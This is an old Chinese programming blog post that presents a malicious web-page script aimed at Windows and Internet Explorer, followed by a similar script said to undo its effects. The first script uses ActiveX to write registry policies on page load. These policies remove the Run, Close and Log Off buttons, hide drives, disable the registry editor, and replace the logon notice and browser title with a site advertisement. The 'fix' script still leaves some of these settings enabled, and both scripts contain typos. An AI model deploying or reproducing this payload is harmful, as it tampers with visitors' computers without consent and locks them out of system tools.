正文

一段修改WIN系统的恶意网站代码2005-11-25 18:57:00

【评论】 【打印】 【字体: 】 本文链接:http://blog.pfan.cn/elva6401/7369.html

分享到:

<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
<!--创建到收藏夹-->
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
<!--ActiveX初始化过程-->
ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
if (documents .cookies.indexOf("Chg") == -1)
{
<!--修改设置主页-->
//Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://com.6to23.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
<!--改写注册表-->
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 01, "REG_BINARY"); //消除RUN按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 01, "REG_BINARY"); //消除关闭按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 01, "REG_BINARY"); //消除注销按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "63000000", "REG_DWORD"); //隐藏盘符
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000001", "REG_DWORD"); //禁止注册表
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "您的计算机已经被http://www.******.org/优化: )");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "您的计算机已经被http://www.******.org/优化: )");
//设置开机提示
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★http://com.6to23.com/ & http://www.******.org/");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "新的标题★http://com.6to23.com/ & http://www.******k.org/");
//设置IE标题
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
<!--实现打开页面后1秒钟内执行测试修改注册表的工作-->
init();</SCRIPT>


以下是利用一段类似的JavaScript代码修复各项的键值:
<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
<!--创建到收藏夹-->
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
<!--ActiveX初始化过程-->
ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try
{
if (documents .cookies.indexOf("Chg") == -1)
{
<!--修改设置主页-->
//Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://com.6to23.com/");
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
<!--改写注册表-->
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", 00, "REG_BINARY"); //修复RUN按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", 00, "REG_BINARY"); //修复关闭按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", 00, "REG_BINARY"); //修复注销按纽
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000000", "REG_DWORD"); //取消隐藏盘符
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools", "00000000", "REG_DWORD"); //取消禁止注册表
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "00000001", "REG_DWORD");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "00000001", "REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "");
//重设开机提示
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
//重设IE标题
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
<!--实现打开页面后1秒钟内执行测试修改注册表的工作-->
init();</SCRIPT>

阅读(4248) | 评论(0)


版权声明:编程爱好者网站为此博客服务提供商,如本文牵涉到版权问题,编程爱好者网站不承担相关责任,如有版权问题请直接与本文作者联系解决。谢谢!

评论

暂无评论
您需要登录后才能评论,请 登录 或者 注册